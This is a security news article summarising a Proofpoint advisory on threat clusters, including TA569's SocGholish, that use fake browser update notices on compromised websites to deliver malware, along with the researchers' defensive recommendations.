Cybersecurity researchers from Proofpoint have identified a rising trend in threat activity that employs fake browser updates to disseminate malware.
At least four distinct threat clusters have been tracked utilizing this deceptive tactic. Fake browser updates are compromised websites that display fake notifications mimicking popular browsers like Chrome, Firefox or Edge, luring users into downloading malicious software instead of legitimate updates.
Writing in an advisory published earlier today, Proofpoint said TA569, a threat actor, has been using fake browser updates for over five years to deliver SocGholish malware. Recently, other threat actors have adopted this strategy.
These threats infiltrate websites using JavaScript or HTML-injected code to direct traffic to their controlled domains and automatically download malicious payloads.
Read more on SocGholish: Four in Five Cyber-Attacks Powered by Just Three Malware Loaders
The success of fake browser update lures lies in exploiting users’ trust in known and safe sites, thereby bypassing security awareness training, Proofpoint security researcher Dusty Miller explained.
Compromised URLs are found in various email traffic sources, including regular emails and monitoring alerts. The threats extend beyond email as users also encounter them on search engines, social media or direct site visits.
Each threat campaign employs unique methods to filter traffic, making detection challenging. These campaigns comprise three stages: injection on a compromised website; traffic to actor-controlled domains; and payload execution on the user’s device.
SocGholish was attributed by Proofpoint to TA569, who observed that the threat actor employed various methods to direct traffic from compromised websites to their actor-controlled domains.
RogueRaticate/FakeSG, a newer threat, injects obfuscated JavaScript code into stage 1 websites and uses Keitaro TDS for payload delivery. ZPHP/SmartApeSG leverages asynchronous requests, while ClearFake employs base64 encoded scripts and displays lures in different languages.
Miller warned that these fake browser update threats underscore the need for robust cybersecurity measures.
“Organizations should have network detections in place – including using the Emerging Threats ruleset – and use endpoint protection,” reads the advisory.
“Additionally, organizations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”
Editorial image credit: Cali6ro / Shutterstock.com